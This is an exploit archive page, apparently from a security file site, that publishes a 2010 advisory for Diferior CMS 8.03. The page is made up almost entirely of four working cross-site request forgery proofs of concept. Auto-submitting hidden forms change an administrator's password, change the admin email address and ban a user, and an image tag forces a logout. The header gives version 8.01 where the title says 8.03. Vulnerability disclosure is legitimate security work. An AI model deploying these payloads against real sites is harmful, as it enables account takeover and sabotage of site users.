Diferior CMS 8.03 Cross Site Request Forgery

Diferior CMS 8.03 Cross Site Request Forgery: Posted Jul 14, 2010; Authored by 10n1z3d; Diferior CMS version 8.01 suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; SHA-256 | 68862d8b3ca0cb1db27ff9190373f9678f4390b26c98b6114cd729d40e073a6d; Download | Favorite | View

Diferior CMS 8.03 Cross Site Request Forgery

<!---
    Title: Diferior CMS 8.03 Multiple CSRF Vulnerabilities
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Tue 13 Jul 2010 11:50:32 AM EEST
    Vendor: http://diferior.com/
    Download: http://diferior.com/post_files/news/diferior-8-03-released/Diferior_v8.03.tar.gz
--->
 
-=[ CSRF PoC 1 - Change Admin Password ]=-
 
    <html>
        <head>
            <title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/user/profile/pass.html" method="post">
                <!--- You can change cust_user to change the password of other user --->
                <input type="hidden" name="cust_user" value="admin" />
                <input type="hidden" name="pass1" value="rootroot" />
                <input type="hidden" name="pass2" value="rootroot" />
            </form>
        </body>
    </html>
     
-=[ CSRF PoC 2 - Change Admin Email ]=-
     
    <html>
        <head>
            <title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Email</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/user/profile/email.html" method="post">
                 <!--- You can change cust_user to change the email of other user --->
                <input type="hidden" name="cust_user" value="admin" />
                <input type="hidden" name="email1" value="root@root.com" />
                <input type="hidden" name="email2" value="root@root.com" />
            </form>
        </body>
    </html>
     
-=[ CSRF PoC 3 - Ban User ]=-
     
    <html>
        <head>
            <title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Ban User</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/user/ban/[username]/2.html" method="post">
                <input type="hidden" name="warned" value="on" />
                <input type="hidden" name="noleech" value="on" />
                <input type="hidden" name="banned" value="on" />
            </form>
        </body>
    </html>
 
-=[ CSRF PoC 4 - Logout The User/Administrator ]=-
 
    <img src="http://[domain]/user/logoff.html" alt="Do you see this?" />
 
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->

Top Authors In Last 30 Days

Red Hat 273 files
Ubuntu 99 files
indoushka 44 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Debian 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,580)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,432)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,710)
UNIX (9,432)
UnixWare (187)
Windows (6,668)
Other

Diferior CMS 8.03 Cross Site Request Forgery

Diferior CMS 8.03 Cross Site Request Forgery

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Diferior CMS 8.03 Cross Site Request Forgery

Share This

Diferior CMS 8.03 Cross Site Request Forgery

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems